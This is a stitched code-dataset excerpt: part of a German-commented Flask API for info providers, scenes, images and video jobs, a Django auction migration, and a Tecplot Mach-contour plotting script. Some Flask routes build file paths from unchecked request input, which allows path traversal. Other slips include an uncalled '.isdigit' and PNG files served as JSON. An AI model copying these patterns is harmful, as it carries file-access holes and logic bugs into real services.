Route zum Löschen eines Infoproviders.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
"""
try:
return flask.jsonify({"status": "successful"}) if queries.delete_infoprovider(infoprovider_id) else \
flask.jsonify({"err_msg": f"Infoprovider with ID {infoprovider_id} could not be removed"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while removing an infoprovider"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>/logs", methods=["GET"])
def get_infoprovider_logs(infoprovider_id):
"""
Endpunkt `/infoprovider/<infoprovider_id>/logs`.
Route um alle Logs von jeder Datenquelle eines Infoproviders zu laden.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
"""
try:
return flask.jsonify(queries.get_infoprovider_logs(infoprovider_id))
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading logs of an infoprovider with the ID {infoprovider_id}"})
return err, 400
@api.route("/infoprovider/<infoprovider_id>/<diagram_name>", methods=["GET"])
def get_infoprovider_test_diagram(infoprovider_id, diagram_name):
"""
Endpunkt `/infoprovider/<infoprovider_id>/<diagram_name>`.
Route um die automatisch generierte Diagrammvorschau eines Diagrams zu laden.
:param infoprovider_id: ID des Infoproviders.
:type infoprovider_id: int
:param diagram_name: Name des Testdiagramms.
:type diagram_name: str
"""
try:
file_path = get_temp_path(queries.get_infoprovider_name(infoprovider_id) + "/" + diagram_name + ".png")
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading logs of an infoprovider with the ID {infoprovider_id}"})
return err, 400
@api.route("/videojob/<videojob_id>", methods=["DELETE"])
def delete_videojob(videojob_id):
"""
Endpunkt `/videojob/<videojob_id>`.
Route zum Löschen eines Videojobs.
:param videojob_id: ID des Videojobs.
:type videojob_id: int
"""
try:
return flask.jsonify({"status": "successful"}) if queries.delete_videojob(int(videojob_id)) else \
flask.jsonify({"err_msg": f"Videojob with ID {videojob_id} could not be removed"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while removing a Videojob"})
return err, 400
@api.route("/videojob/<videojob_id>/preview", methods=["GET"])
def get_videojob_preview(videojob_id):
"""
Endpunkt '/videojob/<id>/preview (GET).
Route über die das Preview-Bild eines Videos abgefragt werden kann.
:param videojob_id: ID des Video-Jobs, dessen Preview geladen werden soll.
:type videojob_id: int
"""
try:
file_path = queries.get_videojob_preview(videojob_id)
err = flask.jsonify({"err_msg": f"Video preview could not be loaded for a videojob with the ID {videojob_id}"})
return send_file(file_path, "application/json", True) if file_path else (err, 400)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify(
{"err_msg": f"An error occurred while loading the preview-image of a videojob with the ID {videojob_id}"})
return err, 400
@api.route("/videojob/<videojob_id>/logs", methods=["GET"])
def get_videojob_logs(videojob_id):
"""
Endpunkt `/infoprovider/logs`.
Route um alle Logs eines Video-Jobs zu laden.
:param videojob_id: ID des Infoproviders.
:type videojob_id: int
"""
try:
return flask.jsonify(queries.get_videojob_logs(videojob_id))
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading logs of a videojob with the ID {videojob_id}"})
return err, 400
@api.route("/testformula", methods=["POST"])
def testformula():
"""
Endpunkt `/testformula`.
Route zum Testen einer gegebenen Formel.
Die Response enthält einen boolschen Wert, welcher angibt ob die Formel syntaktisch richtig ist.
"""
formula = request.json
try:
if "formula" not in formula:
err = flask.jsonify({"err_msg": "Missing field 'formula'"})
return err, 400
tmp = queries.remove_toplevel_key(formula["formula"])
if tmp[0].isdigit:
tmp = "|" + tmp
str2json(tmp.replace("|", "uzjhnjtdryfguljkm"))
return flask.jsonify({"accepted": True})
except SyntaxError:
return flask.jsonify({"accepted": False})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while testing a formula"})
return err, 400
@api.route("/scene", methods=["POST"])
def add_scene():
"""
Endpunkt '/scene'.
Route zum Hinzufügen einer neuen Szene. Das Szenen-JSON muss die Keys 'scene_name', 'used_images', 'used_infoproviders',
'images', 'backgroundImage', 'backgroundType', 'backgroundColor', 'backgroundColorEnabled', 'itemCounter' und
'scene_items' enthalten.
"""
scene = request.json
try:
if "scene_name" not in scene:
err = flask.jsonify({"err_msg": "Missing Scene-Name"})
return err, 400
if "used_images" not in scene:
err = flask.jsonify({"err_msg": "Missing list of used images"})
return err, 400
if "used_infoproviders" not in scene:
err = flask.jsonify({"err_msg": "missing list of used infoproviders'"})
return err, 400
if "images" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'images'"})
return err, 400
if "backgroundImage" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundImage'"})
return err, 400
if "backgroundType" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundType'"})
return err, 400
if "backgroundColor" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundColor'"})
return err, 400
if "backgroundColorEnabled" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'backgroundColorEnabled'"})
return err, 400
if "itemCounter" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'itemCounter'"})
return err, 400
if "scene_items" not in scene:
err = flask.jsonify({"err_msg": "Missing field 'scene_items'"})
return err, 400
msg = queries.insert_scene(scene)
if msg:
err = flask.jsonify({"err_msg": msg})
return err, 400
return "", 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding a scene"})
return err, 400
@api.route("/scene/all", methods=["GET"])
def get_all_scenes():
"""
Endpunkt '/scene/all'.
Route mit der Informationen zu allen Szenen geladen werden können.
"""
try:
return flask.jsonify(queries.get_scene_list())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occuured while loading information about all scenes"})
return err, 400
@api.route("/scene/<id>", methods=["GET"])
def get_scene(id):
"""
Endpunkt '/scene/<id>' (GET).
Route über die das Json-Objekt der Szene geladen werden kann.
:param id: Die ID zu der Szene welche geladen werden soll.
:type id: int
"""
try:
scene_json = queries.get_scene(id)
if scene_json is None:
err = flask.jsonify({"err_msg": f"Could not load scene with ID {id}"})
return err, 400
return flask.jsonify(scene_json)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading a scene"})
return err, 400
@api.route("/scene/<id>", methods=["PUT"])
def update_scene(id):
"""
Endpunkt '/scene/<id>' (PUT).
Route über die die Daten einer Szene verändert werden können.
Request muss das Json-Objekt enthälten welches das alte Objekt überschreiben soll.
:param id: ID der Szene die überschrieben werden soll.
:type id: int
"""
updated_data = request.json
try:
if "scene_name" not in updated_data:
err = flask.jsonify({"err_msg": "Missing Scene-Name"})
return err, 400
if "used_images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing list of used images"})
return err, 400
if "used_infoproviders" not in updated_data:
err = flask.jsonify({"err_msg": "missing list of used infoproviders'"})
return err, 400
if "images" not in updated_data:
err = flask.jsonify({"err_msg": "Missing field 'images'"})
return err, 400
update_info = queries.update_scene(id, updated_data)
if update_info is not None:
err = flask.jsonify(update_info)
return err, 400
return "Successful", 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while updating the scene with the ID {id}"})
return err, 400
@api.route("/scene/<id>", methods=["DELETE"])
def delete_scene(id):
"""
Endpunkt '/scene/<id>' (DELETE).
Route über die eine Szene anhand ihrer ID gelöscht werden kann.
:param id: ID der Szene.
:type id: int
"""
try:
success = queries.delete_scene(id)
return flask.jsonify({"status": "successful"}) if success else flask.jsonify({"err_msg": f"Could not remove scene with ID {id}"})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while deleting the scene with the ID {id}"})
return err, 400
@api.route("/scene/<id>/preview", methods=["GET"])
def get_scene_preview(id):
"""
Endpunkt '/scene/<id>/preview (GET).
Route über die das Preview-Bild einer Szene abgefragt werden kann.
:param id: ID der Szene.
:type id: int
"""
try:
file_path = queries.get_scene_preview(id)
err = flask.jsonify({"err_msg": f"Scene preview could not be loaded for the scene with the ID {id}"})
return send_file(file_path, "application/json", True) if file_path else (err, 400)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading the preview-image of the scene with the ID {id}"})
return err, 400
@api.route("/image/<folder>", methods=["POST"])
def add_scene_image(folder):
"""
Endpunkt '/image/<folder>'.
Route über die ein neues Bild für eine Szene hinzugefügt werden kann.
Request-Form muss den Key 'name' und das Bild selbst enthalten.
:param folder: Gibt den Ordner an in den das Bild gespeichert werden soll. Optionen sind hier "backgrounds",
"pictures" oder "scene".
:type folder: str
"""
try:
if folder != "backgrounds" and folder != "pictures" and folder != "scene":
err = flask.jsonify({"err_msg": "Invalid image-folder"})
return err, 400
if "image" not in request.files:
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Image Name"})
return err, 400
image = request.files["image"]
name = f"{datetime.now().strftime('%Y-%m-%d_%H-%M.%S.%f')}_-_{request.form['name']}"
if image.filename == '':
err = flask.jsonify({"err_msg": "Missing Image Filename"})
return err, 400
if not _check_image_extention(image.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_extension = secure_filename(image.filename).rsplit(".", 1)[1]
# file_path = queries.get_scene_image_path(name, folder, file_extension)
file_path = queries.get_image_path(name, folder, file_extension)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Image Name (Image maybe exists already)"})
return err, 400
image_id = queries.insert_image(name + "." + file_extension, folder)
if not image_id:
err = flask.jsonify({"err_msg": "Image could not be added to the database"})
return err, 400
image.save(file_path)
msg = flask.jsonify({"image_id": image_id,
"path": file_path})
return msg, 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding an image"})
return err, 400
@api.route("/image/all/<folder>", methods=["GET"])
def get_all_scene_images(folder):
"""
Endpunkt '/image/<folder>'.
Route über die Informationen über alle Bilder eines bestimmten Ordners erhalten werden können.
Zulässige Ordner sind hier 'backgrounds', 'pictures' und 'scene'.
Response enthält eine Liste von Bild-Elementen. Jedes Bild-Element enthält die ID, den Namen und das Bild selbst.
:param folder: Gibt den Ordner an in den das Bild gespeichert werden soll. Optionen sind hier "backgrounds",
"pictures" oder "scene".
:type folder: str
"""
try:
if folder != "backgrounds" and folder != "pictures" and folder != "scene":
err = flask.jsonify({"err_msg": "Invalid image-folder"})
return err, 400
images = queries.get_image_list(folder)
return flask.jsonify(images)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": f"An error occurred while loading information about all images of the folder {folder}"})
return err, 400
@api.route("/image/<id>", methods=["GET"])
def get_image(id):
"""
Endpunkt '/image/<id>' (GET).
Route über die ein Szenen-Bild geladen werden kann.
:param id: ID des Bilders welches gesendet werden soll.
:type id: int
"""
try:
file_path = queries.get_scene_image_file(id)
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while loading a scene-image"})
return err, 400
@api.route("/image/<id>", methods=["DELETE"])
def delete_scene_image(id):
"""
Endpunkt '/image/<id>' (DELETE).
Route über die ein Szenen-Bild gelöscht werden kann.
:param id: ID des Bildes welches gelöscht werden soll.
:type id: int
"""
try:
success = queries.delete_scene_image(id)
return flask.jsonify({"success": success})
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while deleting an image"})
return err, 400
@api.route("/thumbnailpreview", methods=["POST"])
def set_preview():
"""
Endpunkt `/thumbnailpreview`.
Ermöglicht dass eine Szene als preview eines Videos gesetzt werden kann.
Request muss ein Json sein, welches die Keys 'videojob_id' und 'scene_id' enthält. 'scene_id' ist dabei die ID der
Szene, die als Preview genutzt werden soll.
"""
data = request.json
try:
if "videojob_id" not in data:
err = flask.jsonify({"err_msg": "Missing field 'videojob_id'"})
return err, 400
if "scene_id" not in data:
err = flask.jsonify({"err_msg": "Missing field 'scene_id'"})
return err, 400
msg = queries.set_videojob_preview(data["videojob_id"], data["scene_id"])
if msg:
err = flask.jsonify(msg)
return err, 400
return "", 200
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while setting an image as the preview of a scene"})
return err, 400
@api.route("/topics", methods=["GET"])
def topics():
"""
Endpunkt `/topics`.
Die Response enthält die Liste, der zur Videogenerierung verfügbaren Themen.
"""
try:
return flask.jsonify(queries.get_topic_names())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the list of topics"})
return err, 400
@api.route("/topic", methods=["PUT"])
def add_topic():
"""
Endpunkt `/topic`.
Route zum hinzufügen eines Themas.
"""
try:
if "config" not in request.files:
err = flask.jsonify({"err_msg": "Missing File"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Topic name"})
return err, 400
file = request.files["config"]
name = request.form["name"]
if file.filename == '':
err = flask.jsonify({"err_msg": "Missing File"})
return err, 400
if not _check_json_extention(file.filename):
err = flask.jsonify({"err_msg": "Invalid file extention"})
return err, 400
filename = secure_filename(file.filename).rsplit(".", 1)[0]
file_path = queries._get_steps_path(filename)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid File Name (File maybe exists already)"})
return err, 400
queries.add_topic(name, filename)
file.save(queries._get_steps_path(filename))
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/image", methods=["PUT"])
def add_image():
"""
Endpunkt `/image`.
Route zum hinzufügen eines Bildes für ein Thema.
"""
try:
if "image" not in request.files:
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Image Name"})
return err, 400
if "folder" in request.form:
folder = request.form["folder"]
else:
folder = ''
image = request.files["image"]
name = request.form["name"]
if image.filename == '':
err = flask.jsonify({"err_msg": "Missing Image"})
return err, 400
if not _check_image_extention(image.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_extension = secure_filename(image.filename).rsplit(".", 1)[1]
file_path = queries.get_image_path(name, folder, file_extension)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Image Name (Image maybe exists already)"})
return err, 400
image.save(file_path)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/audio", methods=["PUT"])
def add_audio():
"""
Endpunkt `/audio`.
Route zum hinzufügen eines Audiostückes.
"""
try:
if "audio" not in request.files:
err = flask.jsonify({"err_msg": "Missing Audio File"})
return err, 400
if "name" not in request.form:
err = flask.jsonify({"err_msg": "Missing Audio File Name"})
return err, 400
audio = request.files["audio"]
name = request.form["name"]
if audio.filename == '':
err = flask.jsonify({"err_msg": "Missing Audio Name"})
return err, 400
if not _check_mp3_extention(audio.filename):
err = flask.jsonify({"err_msg": "Invalid file extension"})
return err, 400
file_path = queries._get_audio_path(name)
if path.exists(file_path):
err = flask.jsonify({"err_msg": "Invalid Audio File Name (Audio File maybe exists already)"})
return err, 400
audio.save(file_path)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 500
@api.route("/topic/<topic_id>", methods=["GET"])
def get_topic(topic_id):
"""
Endpunkt `/topic/<topic_id>`.
Der Response enthält die JSON-Datei des Thema.
"""
try:
file_path = queries.get_topic_file(topic_id)
if file_path is None:
err = flask.jsonify({"err_msg": "Unknown topic"})
return err, 400
return send_file(file_path, "application/json", True)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 400
@api.route("/topic/<topic_id>", methods=["DELETE"])
def delete_topic(topic_id):
"""
Endpunkt `/topic/<topic_id>`.
Route zum löschen eines Themas.
"""
try:
queries.delete_topic(topic_id)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred"})
return err, 400
@api.route("/params/<topic_id>", methods=["GET"])
def params(topic_id):
"""
Endpunkt `/params`.
GET-Parameter: "topic".
Die Response enthält die Parameterinformationen für das übergebene Thema.
"""
try:
params = queries.get_params(topic_id)
if (params == None):
err = flask.jsonify({"err_msg": "Unknown topic"})
return err, 400
return flask.jsonify(params)
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the parameters for Topic ID: " + topic_id})
return flask.jsonify(err, 400)
@api.route("/jobs", methods=["GET"])
def jobs():
"""
Endpunkt `/jobs`.
Die Response enthält, die in der Datenbank angelegten, Jobs.
"""
try:
return flask.jsonify(queries.get_job_list())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while retrieving the list of jobs"})
return err, 400
@api.route("/add", methods=["POST"])
def add():
"""
Endpunkt `/add`.
Der Request-Body enthält die Informationen für den neuen Job im JSON-Format.
"""
job = request.json
try:
queries.insert_job(job)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while adding the job"})
return err, 400
@api.route("/edit/<job_id>", methods=["PUT"])
def edit(job_id):
"""
Endpunkt `/edit`.
Aktualisert den Job-Datenbank-Eintrag mit der übergebenen ID.
Der Request-Body enthält die Informationen, mit denen der Job aktualisert werden soll.
:param id: URL-Parameter <id>
:type id: str
"""
updated_job_data = request.json
try:
queries.update_job(job_id, updated_job_data)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while updating job information"})
return err, 400
@api.route("/remove/<job_id>", methods=["DELETE"])
def remove(job_id):
"""
Endpunkt `/remove`.
Löscht den Job-Datenbank-Eintrag mit der übergebenen ID.
:param id: URL-Parameter <id>
:type id: str
"""
try:
queries.delete_job(job_id)
return "", 204
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while deleting the job"})
return err, 400
@api.route("/logs", methods=["GET"])
def logs():
"""
Endpunkt `/logs`.
Gibt die Logs der Jobs zurück
"""
try:
return flask.jsonify(queries.get_logs())
except Exception:
logger.exception("An error occurred: ")
err = flask.jsonify({"err_msg": "An error occurred while getting the logs"})
return err, 400
def _check_json_extention(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() == "json"
def _check_mp3_extention(filename):
return "." in filename and filename.rsplit(".", 1)[1].lower() == "mp3"
def _check_image_extention(filename):
return "." in filename and (
filename.rsplit(".", 1)[1].lower() == "png" or filename.rsplit(".", 1)[1].lower() == "jpeg" or
filename.rsplit(".", 1)[1].lower() == "jpg")
| 33.898974 | 137 | 0.620652 |
c2d0f1f1858066ddbc5efc00de7b1529da6e06e4
| 2,172 |
py
|
Python
|
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
saku/auction/migrations/0001_initial.py
|
Mehdi-MosTafavi/Saku-Backend
|
348a1a676ffc8ddd9077f8c94733c5f6dce98fbd
|
[
"MIT"
] | null | null | null |
# Generated by Django 4.0.3 on 2022-04-23 09:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
options={
'db_table': 'saku_category',
},
),
migrations.CreateModel(
name='Tags',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
],
options={
'db_table': 'saku_Tags',
},
),
migrations.CreateModel(
name='Auction',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', models.DateTimeField(auto_created=True)),
('name', models.CharField(max_length=20)),
('token', models.CharField(max_length=8, unique=True)),
('finished_at', models.DateTimeField()),
('mode', models.IntegerField(choices=[(1, 'Increasing'), (2, 'Decreasing')], default=1)),
('limit', models.IntegerField(default=0)),
('is_private', models.BooleanField(default=False)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='auction.category')),
('tags', models.ManyToManyField(to='auction.tags')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'saku_auction',
},
),
]
| 38.105263 | 119 | 0.558471 |
66148cb9223c8b7fc9637bef4bdaade367fee468
| 2,939 |
py
|
Python
|
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | 1 |
2019-02-11T00:45:37.000Z
|
2019-02-11T00:45:37.000Z
|
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | null | null | null |
Python/plotSurfaceMachContour.py
|
guillaumetousignant/euler3D
|
7bdfaae7f6b774232b6fc9f83d40a67ccee9a8ae
|
[
"MIT"
] | null | null | null |
import tecplot
import numpy as np
import math
import string
from tecplot.exception import *
from tecplot.constant import *
class plotSurfaceMachContour(object):
def __init__(self, mySurfaceFlowFile, Type):
print("plotMachContour.................................................");
self.mySurfaceFlowFile_ = mySurfaceFlowFile;
self.type_ = Type;
if self.type_ == 0: #EULER
dataset = tecplot.data.load_tecplot_szl(self.mySurfaceFlowFile_, read_data_option=2);
elif self.type_ == 1: #SU2
dataset = tecplot.data.load_tecplot(self.mySurfaceFlowFile_, read_data_option=2);
frame = tecplot.active_frame();
plot = frame.plot(PlotType.Cartesian3D)
plot.activate()
plot.show_contour = True;
if self.type_ == 0: # EULER
plot.contour(0).variable = dataset.variable(9);
elif self.type_ == 1: # SU2
plot.contour(0).variable = dataset.variable(11);
# Set Rainbow
plot.contour(0).colormap_name = 'Small Rainbow';
# Set View
plot.view.width = 1.91291;
plot.view.alpha = -47.73;
plot.view.theta = 137.32;
plot.view.psi = 136.51;
plot.view.position = (-6.57402, 7.48889, -10.3657);
# Save layout for Tecplot
print("Save MachContour_fullbody.lay...................................");
tecplot.save_layout('../Python/lay/MachContour_fullbody.lay');
print("Save MachContour_fullbody.lay...............................DONE");
# export image of full body
print("Save MachContour_fullbody.png...................................");
tecplot.export.save_png('../Python/png/MachContour_fullbody.png', 2000, supersample=3);
print("Save MachContour_fullbody.png...............................DONE");
plot = frame.plot(PlotType.Cartesian2D)
plot.activate()
plot.show_contour = True;
if self.type_ == 0: # EULER
plot.contour(0).variable = dataset.variable(9);
elif self.type_ == 1: # SU2
plot.contour(0).variable = dataset.variable(11);
plot.axes.x_axis.show = False;
plot.axes.y_axis.show = False;
# Save layout for Tecplot
print("Save MachContour_wing.lay.......................................");
tecplot.save_layout('../Python/lay/MachContour_wing.lay');
print("Save MachContour_wing.lay...................................DONE");
# export image of wing
print("Save MachContour_wing.png.......................................");
tecplot.export.save_png('../Python/png/MachContour_wing.png', 2000, supersample=3);
print("Save MachContour_wing.png...................................DONE");
print("plotMachContour.............................................DONE");
| 40.260274 | 98 | 0.536237 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.